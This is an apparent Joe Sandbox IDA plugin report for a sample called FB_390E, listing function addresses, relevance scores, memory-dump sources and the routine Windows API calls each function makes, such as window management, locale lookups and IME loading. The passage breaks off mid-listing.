Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00406420, Relevance: 1.5, APIs: 1, Instructions: 31

APIs

LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004070FE, Relevance: 1.5, APIs: 1, Instructions: 28

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00407100, Relevance: 1.5, APIs: 1, Instructions: 27

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00405908, Relevance: 1.5, APIs: 1, Instructions: 26

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?,00000400,?,004101C4,00413D13,00000000,00413D38), ref: 00405926

Part of subcall function 00405B44: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
Part of subcall function 00405B44: RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
Part of subcall function 00405B44: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
Part of subcall function 00405B44: GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
Part of subcall function 00405B44: GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
Part of subcall function 00405B44: lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00455F14, Relevance: 1.5, APIs: 1, Instructions: 24

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00455F3E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00401700, Relevance: 1.3, APIs: 1, Instructions: 54

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0040176D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041C830, Relevance: 1.3, APIs: 1, Instructions: 52

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004013C8, Relevance: 1.3, APIs: 1, Instructions: 34

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,004645F4,0040142B,?,?,004014CB,?,?,?,00000000,00004003,00401A0B), ref: 004013DB

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 003D3AAE, Relevance: 1.3, APIs: 1, Instructions: 12

APIs

CloseHandle.KERNEL32 ref: 003D3AB2

Memory Dump Source

Source File: 00000007.00000002.248815100.003D0000.00000040.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_FB_390E.jbxd

Non-executed Functions

Function 0040598C, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E

Part of subcall function 00405978: CharNextA.USER32(?), ref: 0040597B

lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

Strings

kernel32.dll, xrefs: 004059A4
GetLongPathNameA, xrefs: 004059B4
\, xrefs: 00405AC1

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00453090, Relevance: 18.4, APIs: 12, Instructions: 407

APIs

Part of subcall function 00457668: IsChild.USER32(00000000,00000000), ref: 004576C6

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00453411
ShowWindow.USER32(00000000,00000003), ref: 00453421
ShowWindow.USER32(00000000,00000002), ref: 00453443
CallWindowProcA.USER32(00406BD0,00000000,00000005,00000000,?), ref: 0045346C
SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00453491
ShowWindow.USER32(00000000,?), ref: 004534B6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0045354F
GetActiveWindow.USER32 ref: 00453562
IsIconic.USER32(00000000), ref: 00453574

Part of subcall function 0044DEDC: GetCurrentThreadId.KERNEL32(Function_0004DE78,00000000,0045358A,00000000,00000000,004535DD), ref: 0044DEF6
Part of subcall function 0044DEDC: EnumThreadWindows.USER32(00000000,Function_0004DE78,00000000), ref: 0044DEFC

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004535A8
SetActiveWindow.USER32(00000000), ref: 004535AE
ShowWindow.USER32(00000000,00000000), ref: 004535C0

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0043D99C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64

APIs

IsIconic.USER32(?), ref: 0043D9AB
GetWindowPlacement.USER32(?,0000002C), ref: 0043D9C8
GetWindowRect.USER32(?), ref: 0043D9E1
GetWindowLongA.USER32(?,000000F0), ref: 0043D9EF
GetWindowLongA.USER32(?,000000F8), ref: 0043DA04
ScreenToClient.USER32(00000000), ref: 0043DA11
ScreenToClient.USER32(00000000,?), ref: 0043DA1C

Strings

,, xrefs: 0043D9B4

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00456740, Relevance: 9.1, APIs: 6, Instructions: 86

APIs

IsIconic.USER32(?), ref: 00456748
SetActiveWindow.USER32(?), ref: 00456759
IsWindowEnabled.USER32(00000000), ref: 0045677C
DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 00456795

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

SetWindowPos.USER32(?,00000000,00000000,?,?,0045618A,00000000), ref: 004567DB
SetFocus.USER32(00000000), ref: 00456820

Part of subcall function 004514F0: ShowWindow.USER32(00000000,?), ref: 00451527

Part of subcall function 00455DB4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00455E07

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0043D0B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81

APIs

IsIconic.USER32(?), ref: 0043D0F7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043D115
GetWindowPlacement.USER32(?,0000002C), ref: 0043D14B
SetWindowPlacement.USER32(?,0000002C), ref: 0043D16F

Strings

,, xrefs: 0043D139

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00456690, Relevance: 7.6, APIs: 5, Instructions: 59

APIs

IsIconic.USER32(00000000), ref: 00456698
SetActiveWindow.USER32(00000000), ref: 004566B0
IsWindowEnabled.USER32(00000000), ref: 004566D3
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0042658C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46

APIs

IsIconic.USER32(?), ref: 004265D5
GetWindowPlacement.USER32(?,?), ref: 004265E3
GetWindowRect.USER32(?,?), ref: 004265EF

Part of subcall function 004264FC: GetSystemMetrics.USER32(00000000), ref: 0042654D
Part of subcall function 004264FC: GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromWindow, xrefs: 004265A3

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 004087A4, Relevance: 6.0, APIs: 4, Instructions: 37

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004087BF
FindClose.KERNEL32(00000000,00000000,?), ref: 004087CA
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004087E3
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004087F4

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0043C810, Relevance: 3.1, APIs: 2, Instructions: 63

APIs

IsIconic.USER32(?), ref: 0043C848
GetCapture.USER32(?), ref: 0043C851

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0040AA6C, Relevance: 3.0, APIs: 2, Instructions: 37

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AA92
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AAAB

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 0040976C, Relevance: 1.5, APIs: 1, Instructions: 29

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 004097B8, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AD7E,00000000,0040AF97,?,?,00000000,00000000), ref: 004097CB

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00441F3C, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95

APIs

SetErrorMode.KERNEL32(00008000), ref: 00441F55
GetModuleHandleA.KERNEL32(USER32,00000000,004420A2,?,00008000), ref: 00441F79
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,004420A2,?,00008000), ref: 00441F86
LoadLibraryA.KERNEL32(IMM32.DLL), ref: 00441FA2
GetProcAddress.KERNEL32(00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FC4
GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FD9
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FEE
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442003
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442018
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2), ref: 0044202D
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000), ref: 00442042
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00442057
GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0044206C
GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00442081
SetErrorMode.KERNEL32(?,004420A9,00008000), ref: 0044209C

Strings

ImmIsIME, xrefs: 00442061
ImmSetCompositionFontA, xrefs: 00442037
ImmReleaseContext, xrefs: 00441FCE
ImmNotifyIME, xrefs: 00442076
ImmGetConversionStatus, xrefs: 00441FE3
IMM32.DLL, xrefs: 00441F9D
WINNLSEnableIME, xrefs: 00441F80
ImmSetConversionStatus, xrefs: 00441FF8
ImmSetCompositionWindow, xrefs: 00442022
USER32, xrefs: 00441F74
ImmSetOpenStatus, xrefs: 0044200D
ImmGetCompositionStringA, xrefs: 0044204C
ImmGetContext, xrefs: 00441FB9

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00427C9C, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 98

APIs

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00427CA3
GetProcAddress.KERNEL32(00000000,InitializeFlatSB,comctl32.dll), ref: 00427CB8
GetProcAddress.KERNEL32(00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CC8
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CD8
